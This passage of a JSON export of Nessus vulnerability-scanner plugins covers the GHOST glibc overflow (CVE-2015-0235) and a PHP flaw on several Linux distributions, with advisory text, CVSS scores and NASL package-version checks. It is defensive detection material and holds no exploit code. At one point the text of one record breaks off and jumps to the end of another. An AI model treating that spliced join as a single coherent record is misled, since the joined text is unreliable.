value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"glibc-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-common-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-devel-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-headers-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-utils-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"nscd-2.5-123.0.1.el5_11.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:52", "description": "This update for glibc fixes the following security issue :\n\nCVE-2015-0235: A vulnerability was found and fixed in the GNU C Library, specifically in the function gethostbyname(), that could lead to a local or remote buffer overflow. 
(bsc#913646)", "cvss3": {}, "published": "2015-02-03T00:00:00", "type": "nessus", "title": "openSUSE Security Update : glibc (openSUSE-SU-2015:0184-1) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:glibc", "p-cpe:/a:novell:opensuse:glibc-debuginfo", "p-cpe:/a:novell:opensuse:glibc-debugsource", "p-cpe:/a:novell:opensuse:glibc-devel", "p-cpe:/a:novell:opensuse:glibc-devel-debuginfo", "p-cpe:/a:novell:opensuse:glibc-devel-static", "p-cpe:/a:novell:opensuse:glibc-extra", "p-cpe:/a:novell:opensuse:glibc-extra-debuginfo", "p-cpe:/a:novell:opensuse:glibc-html", "p-cpe:/a:novell:opensuse:glibc-i18ndata", "p-cpe:/a:novell:opensuse:glibc-info", "p-cpe:/a:novell:opensuse:glibc-locale", "p-cpe:/a:novell:opensuse:glibc-locale-debuginfo", "p-cpe:/a:novell:opensuse:glibc-obsolete", "p-cpe:/a:novell:opensuse:glibc-obsolete-debuginfo", "p-cpe:/a:novell:opensuse:glibc-profile", "p-cpe:/a:novell:opensuse:glibc-utils", "p-cpe:/a:novell:opensuse:glibc-utils-32bit", "p-cpe:/a:novell:opensuse:glibc-utils-debuginfo", "p-cpe:/a:novell:opensuse:glibc-utils-debuginfo-32bit", "p-cpe:/a:novell:opensuse:glibc-utils-debugsource", "p-cpe:/a:novell:opensuse:nscd", "p-cpe:/a:novell:opensuse:nscd-debuginfo", "cpe:/o:novell:opensuse:12.3"], "id": "OPENSUSE-2015-84.NASL", "href": "https://www.tenable.com/plugins/nessus/81136", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and 
package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-84.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81136);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-0235\");\n\n script_name(english:\"openSUSE Security Update : glibc (openSUSE-SU-2015:0184-1) (GHOST)\");\n script_summary(english:\"Check for the openSUSE-2015-84 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for glibc fixes the following security issue :\n\nCVE-2015-0235: A vulnerability was found and fixed in the GNU C\nLibrary, specifically in the function gethostbyname(), that could lead\nto a local or remote buffer overflow. 
(bsc#913646)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=913646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2015-02/msg00001.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-i18ndata\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
php54-common / php54-dba / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:52:33", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nA use-after-free flaw was found in the unserialize() function of PHP's DateTimeZone implementation. A malicious script author could possibly use this flaw to disclose certain portions of server memory.\n(CVE-2015-0273)", "cvss3": {}, "published": "2015-03-25T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : php55 (ALAS-2015-494) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235", "CVE-2015-0273"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php55", "p-cpe:/a:amazon:linux:php55-bcmath", "p-cpe:/a:amazon:linux:php55-cli", "p-cpe:/a:amazon:linux:php55-common", "p-cpe:/a:amazon:linux:php55-dba", "p-cpe:/a:amazon:linux:php55-debuginfo", "p-cpe:/a:amazon:linux:php55-devel", "p-cpe:/a:amazon:linux:php55-embedded", "p-cpe:/a:amazon:linux:php55-enchant", "p-cpe:/a:amazon:linux:php55-fpm", "p-cpe:/a:amazon:linux:php55-gd", "p-cpe:/a:amazon:linux:php55-gmp", "p-cpe:/a:amazon:linux:php55-imap", "p-cpe:/a:amazon:linux:php55-intl", 
"p-cpe:/a:amazon:linux:php55-ldap", "p-cpe:/a:amazon:linux:php55-mbstring", "p-cpe:/a:amazon:linux:php55-mcrypt", "p-cpe:/a:amazon:linux:php55-mssql", "p-cpe:/a:amazon:linux:php55-mysqlnd", "p-cpe:/a:amazon:linux:php55-odbc", "p-cpe:/a:amazon:linux:php55-opcache", "p-cpe:/a:amazon:linux:php55-pdo", "p-cpe:/a:amazon:linux:php55-pgsql", "p-cpe:/a:amazon:linux:php55-process", "p-cpe:/a:amazon:linux:php55-pspell", "p-cpe:/a:amazon:linux:php55-recode", "p-cpe:/a:amazon:linux:php55-snmp", "p-cpe:/a:amazon:linux:php55-soap", "p-cpe:/a:amazon:linux:php55-tidy", "p-cpe:/a:amazon:linux:php55-xml", "p-cpe:/a:amazon:linux:php55-xmlrpc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-494.NASL", "href": "https://www.tenable.com/plugins/nessus/82043", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-494.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82043);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-0235\", \"CVE-2015-0273\");\n script_xref(name:\"ALAS\", value:\"2015-494\");\n\n script_name(english:\"Amazon Linux AMI : php55 (ALAS-2015-494) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. 
(CVE-2015-0235)\n\nA use-after-free flaw was found in the unserialize() function of PHP's\nDateTimeZone implementation. A malicious script author could possibly\nuse this flaw to disclose certain portions of server memory.\n(CVE-2015-0273)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-494.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php55' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-enchant\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:php55-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php55-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-bcmath-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-cli-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-common-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-dba-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-debuginfo-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-devel-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 
reference:\"php55-embedded-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-enchant-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-fpm-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-gd-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-gmp-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-imap-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-intl-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-ldap-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mbstring-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mcrypt-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mssql-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mysqlnd-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-odbc-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-opcache-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pdo-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pgsql-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-process-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pspell-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-recode-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-snmp-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-soap-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-tidy-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-xml-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 
reference:\"php55-xmlrpc-5.5.22-1.98.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php55 / php55-bcmath / php55-cli / php55-common / php55-dba / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:55:06", "description": "19 Feb 2015, PHP 5.6.6\n\nCore :\n\n - Removed support for multi-line headers, as the are deprecated by RFC 7230. (Stas)\n\n - Fixed bug #67068 (getClosure returns somethings that's not a closure). (Danack at basereality dot com)\n\n - Fixed bug #68942 (Use after free vulnerability in unserialize() with DateTimeZone). (CVE-2015-0273) (Stas)\n\n - Fixed bug #68925 (Mitigation for CVE-2015-0235 ' GHOST: glibc gethostbyname buffer overflow). (Stas)\n\n - Fixed Bug #67988 (htmlspecialchars() does not respect default_charset specified by ini_set) (Yasuo)\n\n - Added NULL byte protection to exec, system and passthru. (Yasuo)\n\nDba :\n\n - Fixed bug #68711 (useless comparisons). (bugreports at internot dot info)\n\nEnchant :\n\n - Fixed bug #68552 (heap buffer overflow in enchant_broker_request_dict()). (Antony)\n\nFileinfo :\n\n - Fixed bug #68827 (Double free with disabled ZMM).\n (Joshua Rogers)\n\n - Fixed bug #67647 (Bundled libmagic 5.17 does not detect quicktime files correctly). (Anatol)\n\n - Fixed bug #68731 (finfo_buffer doesn't extract the correct mime with some gifs). (Anatol)\n\nFPM :\n\n - Fixed bug #66479 (Wrong response to FCGI_GET_VALUES).\n (Frank Stolle)\n\n - Fixed bug #68571 (core dump when webserver close the socket). (redfoxli069 at gmail dot com, Laruence)\n\nLIBXML :\n\n - Fixed bug #64938 (libxml_disable_entity_loader setting is shared between threads). 
(Martin Jansen)\n\nMysqli :\n\n - Fixed bug #68114 (linker error on some OS X machines with fixed width decimal support) (Keyur Govande)\n\n - Fixed bug #68657 (Reading 4 byte floats with Mysqli and libmysqlclient has rounding errors) (Keyur Govande)\n\nOpcache :\n\n - Fixed bug with try blocks being removed when extended_info opcode generation is turned on. (Laruence)\n\nPDO_mysql :\n\n - Fixed bug #68750 (PDOMysql with mysqlnd does not allow the usage of named pipes). (steffenb198 at aol dot com)\n\nPhar :\n\n - Fixed bug #68901 (use after free). (bugreports at internot dot info)\n\nPgsql :\n\n - Fixed Bug #65199 (pg_copy_from() modifies input array variable) (Yasuo)\n\nSession :\n\n - Fixed bug #68941 (mod_files.sh is a bash-script) (bugzilla at ii.nl, Yasuo)\n\n - Fixed Bug #66623 (no EINTR check on flock) (Yasuo)\n\n - Fixed bug #68063 (Empty session IDs do still start sessions) (Yasuo)\n\nSqlite3 :\n\n - Fixed bug #68260 (SQLite3Result::fetchArray declares wrong required_num_args). (Julien)\n\nStandard :\n\n - Fixed bug #65272 (flock() out parameter not set correctly in windows). (Daniel Lowrey)\n\n - Fixed bug #69033 (Request may get env. variables from previous requests if PHP works as FastCGI). (Anatol)\n\nStreams :\n\n - Fixed bug which caused call after final close on streams filter. (Bob)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-02-24T00:00:00", "type": "nessus", "title": "Fedora 21 : php-5.6.6-1.fc21 (2015-2315)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235", "CVE-2015-0273"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2015-2315.NASL", "href": "https://www.tenable.com/plugins/nessus/81459", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-2315.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81459);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2015-2315\");\n\n script_name(english:\"Fedora 21 : php-5.6.6-1.fc21 (2015-2315)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"19 Feb 2015, PHP 5.6.6\n\nCore :\n\n - Removed support for multi-line headers, as the are\n deprecated by RFC 7230. (Stas)\n\n - Fixed bug #67068 (getClosure returns somethings that's\n not a closure). (Danack at basereality dot com)\n\n - Fixed bug #68942 (Use after free vulnerability in\n unserialize() with DateTimeZone). (CVE-2015-0273)\n (Stas)\n\n - Fixed bug #68925 (Mitigation for CVE-2015-0235 '\n GHOST: glibc gethostbyname buffer overflow). (Stas)\n\n - Fixed Bug #67988 (htmlspecialchars() does not respect\n default_charset specified by ini_set) (Yasuo)\n\n - Added NULL byte protection to exec, system and\n passthru. 
(Yasuo)\n\nDba :\n\n - Fixed bug #68711 (useless comparisons). (bugreports at\n internot dot info)\n\nEnchant :\n\n - Fixed bug #68552 (heap buffer overflow in\n enchant_broker_request_dict()). (Antony)\n\nFileinfo :\n\n - Fixed bug #68827 (Double free with disabled ZMM).\n (Joshua Rogers)\n\n - Fixed bug #67647 (Bundled libmagic 5.17 does not\n detect quicktime files correctly). (Anatol)\n\n - Fixed bug #68731 (finfo_buffer doesn't extract the\n correct mime with some gifs). (Anatol)\n\nFPM :\n\n - Fixed bug #66479 (Wrong response to FCGI_GET_VALUES).\n (Frank Stolle)\n\n - Fixed bug #68571 (core dump when webserver close the\n socket). (redfoxli069 at gmail dot com, Laruence)\n\nLIBXML :\n\n - Fixed bug #64938 (libxml_disable_entity_loader setting\n is shared between threads). (Martin Jansen)\n\nMysqli :\n\n - Fixed bug #68114 (linker error on some OS X machines\n with fixed width decimal support) (Keyur Govande)\n\n - Fixed bug #68657 (Reading 4 byte floats with Mysqli\n and libmysqlclient has rounding errors) (Keyur\n Govande)\n\nOpcache :\n\n - Fixed bug with try blocks being removed when\n extended_info opcode generation is turned on. (Laruence)\n\nPDO_mysql :\n\n - Fixed bug #68750 (PDOMysql with mysqlnd does not allow\n the usage of named pipes). (steffenb198 at aol dot com)\n\nPhar :\n\n - Fixed bug #68901 (use after free). (bugreports at\n internot dot info)\n\nPgsql :\n\n - Fixed Bug #65199 (pg_copy_from() modifies input array\n variable) 